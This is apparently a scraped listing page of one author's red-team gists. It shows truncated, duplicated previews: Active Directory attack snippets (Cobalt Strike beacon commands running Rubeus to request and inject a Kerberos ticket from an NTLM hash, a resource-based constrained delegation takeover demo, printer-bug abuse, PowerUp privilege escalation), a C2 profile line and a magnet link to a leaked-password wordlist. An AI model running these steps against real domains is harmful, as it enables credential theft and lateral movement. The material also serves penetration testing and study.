Steve Borosh rvrsh3ll

## PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/

<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
    ResourceID = "[Script]ScriptExample";
    GetScript = "\"$(Get-Date): I am being GET\"     | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
    TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";

## Powerup.ps1
<#
    PowerUp aims to be a clearinghouse of common Windows privilege escalation
    vectors that rely on misconfigurations. See README.md for more information.

    Author: @harmj0y
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
#>

## Get-KerberosAESKey.ps1
function Get-KerberosAESKey
{
    <#
    .SYNOPSIS
    Generate Kerberos AES 128/256 keys from a known username/hostname, password, and kerberos realm. The
    results have been verified against the test values in RFC3962, MS-KILE, and my own test lab.

    https://tools.ietf.org/html/rfc3962
    https://msdn.microsoft.com/library/cc233855.aspx

## gist:f0c8537d3672daf7e3803a6b49db2b78
# grab a TGT b64 blob with a valid NTLM
beacon> execute-assembly /home/specter/Rubeus_4.5.exe asktgt /user:USER /rc4:NTLM_HASH

# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi

# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter

# inject the .kirbi

## Get-CIDRCount.ps1
Function Get-CidrHostCount {
    [CmdletBinding()]
    Param (
        [Parameter(Mandatory)]
        [ValidateRange(1,32)]
        $Cidr
    )

    Begin {
    } # End Begin.

## dementor.py
#!/usr/bin/env python

# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/

import os
import sys
import argparse
import binascii
import ConfigParser

## profile
/safebrowsing/rd/CltOb12nLW1IbHehcmUtd2hUdmFzEBAY7-0KIOkUDC7h2,/safebrowsing/rd/CINnu27nLO8hbHdfgmUtc2ihdmFyEAcY4|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

## content_discovery_all.txt
`
~/
~
×™×


___
__
_

## rbcd_demo.ps1
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1

# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami

# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"

## Combined_HaveIBeenPwnedWordlist
magnet:?xt=urn:btih:827FBFFA925AF95BA20C7C0BA8D35807C1E31C75&dn=Combined_HaveIBeenPwnedWordlists.txt&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337%2fannounce
	# This idea originated from this blog post on Invoke DSC Resources directly:
	# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/

	<#
	$MOFContents = @'
	instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
	{
	ResourceID = "[Script]ScriptExample";
	GetScript = "\"$(Get-Date): I am being GET\" \| Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
	TestScript = "\"$(Get-Date): I am being TESTED\" \| Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
	<#
	PowerUp aims to be a clearinghouse of common Windows privilege escalation
	vectors that rely on misconfigurations. See README.md for more information.

	Author: @harmj0y
	License: BSD 3-Clause
	Required Dependencies: None
	Optional Dependencies: None
	#>
	function Get-KerberosAESKey
	{
	<#
	.SYNOPSIS
	Generate Kerberos AES 128/256 keys from a known username/hostname, password, and kerberos realm. The
	results have been verified against the test values in RFC3962, MS-KILE, and my own test lab.

	https://tools.ietf.org/html/rfc3962
	https://msdn.microsoft.com/library/cc233855.aspx
	# grab a TGT b64 blob with a valid NTLM
	beacon> execute-assembly /home/specter/Rubeus_4.5.exe asktgt /user:USER /rc4:NTLM_HASH

	# decode the base64 blob to a binary .kirbi
	$ base64 -d ticket.b64 > ticket.kirbi

	# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
	beacon> make_token DOMAIN\USER PassWordDoesntMatter

	# inject the .kirbi
	Function Get-CidrHostCount {
	[CmdletBinding()]
	Param (
	[Parameter(Mandatory)]
	[ValidateRange(1,32)]
	$Cidr
	)

	Begin {
	} # End Begin.
	#!/usr/bin/env python

	# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
	# some code from https://www.exploit-db.com/exploits/2879/

	import os
	import sys
	import argparse
	import binascii
	import ConfigParser
	# import the necessary toolsets
	Import-Module .\powermad.ps1
	Import-Module .\powerview.ps1

	# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
	whoami

	# the target computer object we're taking over
	$TargetComputer = "primary.testlab.local"